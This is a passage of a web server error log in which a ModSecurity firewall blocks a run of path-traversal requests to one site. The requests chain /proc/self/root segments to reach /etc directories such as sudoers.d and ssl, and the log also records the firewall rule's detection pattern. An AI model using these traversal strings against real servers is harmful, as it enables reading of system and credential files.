"abqbsuyqAr6etmhZHNqybQAAAFI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:33:56.915540 2026] [:error] [pid 19507:tid 140411733534464] [client 74.7.243.128:37318] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqbtNY0UrI5A3LftIyXiQAAAYE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:33:58.581020 2026] [:error] [pid 17887:tid 140411716749056] [client 74.7.243.128:37330] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqbtgkwaGbbGflqUZADpwAAAMM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:34:00.367016 2026] [:error] [pid 17653:tid 140411733534464] [client 74.7.243.128:46120] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqbuMdf6f5d65gmYZTH0QAAAsE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:34:02.587096 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.243.128:46132] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqbuda6ubjKNq_cu4aMTQAAA04"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:34:04.359251 2026] [:error] [pid 15826:tid 140411548894976] [client 74.7.243.128:46136] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqbvOoXxyEfFpUF8f9hhgAAAVc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:34:06.665703 2026] [:error] [pid 17887:tid 140411733534464] [client 74.7.243.128:46142] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqbvQkwaGbbGflqUZADrAAAAME"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:34:08.420628 2026] [:error] [pid 29882:tid 140411708356352] [client 74.7.243.128:46144] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqbwEzinOy1jxa1j4cHtgAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:34:10.569333 2026] [:error] [pid 31803:tid 140411691570944] [client 74.7.243.128:36454] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqbweyqAr6etmhZHNqyhAAAAEY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:34:14.610943 2026] [:error] [pid 11816:tid 140411557287680] [client 74.7.243.128:36466] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqbxuw_le52K8_3pV3S-wAAAhY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:34:17.288064 2026] [:error] [pid 17653:tid 140411716749056] [client 74.7.243.128:36474] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqbycdf6f5d65gmYZTH5AAAAsM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:34:20.863626 2026] [:error] [pid 19507:tid 140411607643904] [client 74.7.243.128:36490] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqbzNY0UrI5A3LftIyXowAAAZA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:34:22.258847 2026] [:error] [pid 30077:tid 140411716749056] [client 74.7.243.128:34736] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqbzvu8EFLIOrSqIpv4KwAAAkM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:34:24.307042 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.243.128:34754] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqb0Na6ubjKNq_cu4aMYAAAA1Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:34:27.155035 2026] [:error] [pid 15051:tid 140411616036608] [client 74.7.243.128:34758] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqb0ymAPhZkrhU8w4lghAAAAI8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:34:28.916754 2026] [:error] [pid 15826:tid 140411716749056] [client 74.7.243.128:34768] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqb1OoXxyEfFpUF8f9hlgAAAUM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:34:36.994508 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.243.128:51228] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqb29a6ubjKNq_cu4aMbQAAA1c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:34:38.741020 2026] [:error] [pid 19507:tid 140411733534464] [client 74.7.243.128:51232] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqb3tY0UrI5A3LftIyXtQAAAYE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:34:41.403782 2026] [:error] [pid 31803:tid 140411641214720] [client 74.7.243.128:35312] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqb4eyqAr6etmhZHNqyrgAAAEw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:34:46.267036 2026] [:error] [pid 15051:tid 140411624429312] [client 74.7.243.128:35326] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqb5imAPhZkrhU8w4lgowAAAI4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:34:47.644573 2026] [:error] [pid 11816:tid 140411557287680] [client 74.7.243.128:35332] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqb5-w_le52K8_3pV3TJAAAAhY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:34:56.923812 2026] [:error] [pid 19507:tid 140411708356352] [client 74.7.243.128:35336] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqb8NY0UrI5A3LftIyX1QAAAYQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:35:04.529357 2026] [mime_magic:error] [pid 15051:tid 140411699963648] (70014)End of file found: [client 74.7.243.128:58074] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/var
